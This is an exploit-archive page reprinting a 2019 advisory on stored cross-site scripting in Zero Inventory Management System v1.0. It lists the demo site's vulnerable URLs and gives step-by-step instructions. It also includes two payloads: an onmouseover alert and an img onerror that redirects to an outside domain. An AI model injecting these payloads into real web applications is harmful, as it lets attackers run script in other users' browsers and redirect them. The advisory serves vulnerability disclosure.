Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060057

Below is a copy:

Zero Inventory Management System v1.0 Stored XSS Injection
/*!
* ::- Title: Zero Inventory Management System v1.0 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/10
* ::- Software: Zero Inventory Management System v1.0
*/
  
::- Details & Description -::
~ Weak security measures like no input fields data filtering has been discovered in the Zero Inventory Management System. Current version of this web-application is 1.0.

::- Demo Website -::
~ https://codecanyon.net/item/zero-inventory-management-system/23875178
~ Backend: http://zeroinfosys.com/inventory
~ Login & Password: doesn't matter, pick any credentials on the backend login page

::- Special Note -::
~ Declared options of this item with price $50 is: Highly Security provided and Injection protected.

::- PoC Links -::
~ http://zeroinfosys.com/inventory/warehouse_manager
~ http://zeroinfosys.com/inventory/admin
~ http://zeroinfosys.com/inventory/showroom_manager/Categories
~ http://zeroinfosys.com/inventory/showroom_manager/Expense

::- PoC [Stored XSS Injection] -::
~ Go to the demo website http://zeroinfosys.com/inventory and log in with provided credentials. Then go to any page you want and add a new data or edit the existed. There is no input data filtering at all, so use any payload you want.
~ You can edit the users profile also, just delete the disabled attribute for any input field or text area and then save your changes.
~ Example #1: <span onmouseover="alert('m0ze')" style="font-size:88px;color:#ff003b;">m0ze</span>
~ Example #2: <img src="x" onerror="alert('m0ze');window.location='http://defcon.su/';">

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.